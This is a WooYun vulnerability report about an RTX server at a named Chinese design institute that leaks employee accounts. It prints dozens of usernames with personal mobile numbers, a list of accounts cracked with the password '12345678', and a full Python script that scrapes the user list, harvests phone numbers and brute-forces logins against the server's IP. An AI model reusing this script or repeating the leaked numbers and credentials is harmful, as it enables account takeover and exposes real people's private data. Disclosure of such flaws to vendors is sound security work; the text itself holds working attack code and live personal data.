当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048585

漏洞标题:rtx服务器结合弱口令泄漏员工帐号密码

相关厂商:中国建筑设计研究院(集团)

漏洞作者: l137

提交时间:2014-01-11 19:14

修复时间:2014-02-25 19:14

公开时间:2014-02-25 19:14

漏洞类型:用户资料大量泄漏

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-11: 细节已通知厂商并且等待厂商处理中
2014-01-16: 厂商已经确认,细节仅向厂商公开
2014-01-26: 细节向核心白帽子及相关领域专家公开
2014-02-05: 细节向普通白帽子公开
2014-02-15: 细节向实习白帽子公开
2014-02-25: 细节向公众公开

简要描述:

rtx server 存在暴露用户信息的漏洞,通过web访问

详细说明:

http://123.127.50.2:8012/userlist.php #泄漏公司所有rtx用户
http://123.127.50.2:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://123.127.50.2:8012/check.php #验证弱口令


2250    zhangs  13683322935
2251    caob    13501098519
2252    luowb   13522144977
2253    lux 13522972058
2254    guihs   18611711855
2256    chengy  13401018026
2257    liuwei  13002155094
2258    lvjg    18611834789
2259    yaojr   13718722130
2260    sunqian 13260483072
2262    zhangjy 15010082958
2263    zhangp  13910709381
2264    xusong  13240188638
2266    liangt  13901385904
2267    jiangsh 13466319132
2269    wangyn  13910397679
2270    xianjh  13671182230
2271    zhaox   15910832790
2272    shaozh  13520275077
2274    weisw   13120452627
2275    louln   13661310480
2276    sunqx   13910323073
2277    zhangyan    13718430085
2278    zhangsuy    13611011805
2281    jinll   13011099030
2282    wancx   13501107909
2283    liudw   13910769115
2284    liuzw   15811128783
2285    wanghui 13466711828
...... 共940+条记录


弱口令可登录
Brute force starting....
Please input the number of threads for brute force(default 10) : 
And it will take a little time ...
username password
zhangm 12345678
songdj 12345678
haoxq 12345678
yuy 12345678
jianghb 12345678
tongl 12345678
yinzy 12345678
sunyb 12345678
wangmz 12345678
wancx 12345678
liudw 12345678
yulei 12345678
wanghui 12345678
xuelei 12345678
xuyc 12345678
liuf 12345678
chenye 12345678
mahong 12345678
liuzx 12345678
liuyy 12345678
changh 12345678
zhuanggw 12345678
zhangj02 12345678
zhangd 12345678
wangk 12345678
sungr 12345678
chengxf 12345678
guyu 12345678
hexw 12345678
wangqi 12345678


rtx check脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# rtx hack
import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time
def usage():
    print '''
Usage : ./f.py -u target_ip
-h   Show this page!
'''
class postThread(threading.Thread):
 
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data
    def run(self):
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e
                
class rtx(object):
    'rtx attacker class'
    ip = ''
    data = ''
    port = '8012'
    
    fullData = ''
    
    def __init__(self, ip):
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            print " ______________"
            print " \033[07m  are you kidding me? \033[27m               "            
            print "      \                    "
            print "       \   \033[1;31m,__,\033[1;m             " 
            print "        \  \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m        "
            print "           \033[1;31m(__)    )\ \033[1;m  "
            print "           \033[1;31m   ||--|| \033[1;m\033[05m*\033[25m\033[1;m      [ l137 | lietdai@gmail.com ]\r\n\r\n"
    @staticmethod
    def checkIp(ip):
        pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
        if re.match(pattern, ip):
            return True
        else:
            return False
    def checkVulnerable(self):
        print "\033[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        #    print self.data[x]
        print " "+str(len(self.data))+" records was found!! \033[0m"
    def checkPhone(self):
        print "\033[1;31m Now check phone number in records.....\033[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "\033[1;31m put the records int out.txt\033[0m"
        #print self.data
    def bruteforce(self):
        print "\033[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...\033[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)                
            except ValueError,e:
                print e
                sys.exit()
            if (num < 1) or (num > 15):
                print "threads must in 1-15"
                sys.exit()
                
        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()
    @staticmethod
    def fwork(port,ip,b):
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            for x in dicts:
                httpClient = None
                try:
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader =  response.getheaders()
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    httpClient.close()
    def getWeakPass(self):
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
            for x in list_file:
                self.dists.append(x.strip('\n'))
def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            r = rtx(a)
        else : 
            usage()
    if len(opts) == 0:
        usage()
    
if __name__ == "__main__" :
    main()

漏洞证明:

Screenshot from 2013-12-28 13:05:39.png

修复方案:

版权声明:转载请注明来源 l137@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-01-16 09:14

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道通报给中国建筑设计研究院处置。

最新状态:

暂无